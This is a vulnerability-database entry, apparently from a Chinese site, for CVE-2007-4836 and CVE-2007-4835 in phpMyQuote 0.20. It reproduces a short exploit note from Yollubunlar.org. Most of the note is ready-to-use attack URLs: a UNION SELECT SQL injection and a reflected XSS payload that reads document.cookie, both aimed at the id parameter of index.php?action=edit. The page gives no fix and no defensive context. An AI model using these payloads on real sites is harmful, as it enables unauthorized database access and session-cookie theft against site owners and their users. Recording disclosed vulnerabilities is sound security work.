phpMyQuote 0.20 Version Multiple Sql And Xss Vulnerabilities

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1052893 漏洞类型
发布时间 2007-09-13 更新时间 2007-09-13
CVE编号 CVE-2007-4836
CVE-2007-4835
CNNVD-ID N/A
漏洞平台 N/A CVSS评分 N/A
|漏洞来源
https://cxsecurity.com/issue/WLB-2007090038
|漏洞详情
漏洞细节尚未披露
|漏洞EXP
///////////////  Yollubunlar.org ///////////////

title: phpMyQuote 0.20 Version Multiple Sql And Xss Vulnerabilities

Author : Yollubunlar.Org

Orginal Article: http://yollubunlar.org/phpmyquote-020-version-multiple-sql-and-xss-vulne
rabilities-3501.html

MainPage: http://yollubunlar.org/category/web-security

mail : yollubunlar (at) yollubunlar (dot) org [email concealed]

Exploit Sql : http://site.com/script_path/index.php?action=edit&id=[Sql injction]

Example : /index.php?action=edit&id=-1%20union%20select%200,1,2,3,4,5/*

Exploit Xss :http://site.com/script_path/index.php?action=edit&id=%3Cscript%3Ealert(
document.cookie)%3C/script%3E

///////////////  Yollubunlar.org ///////////////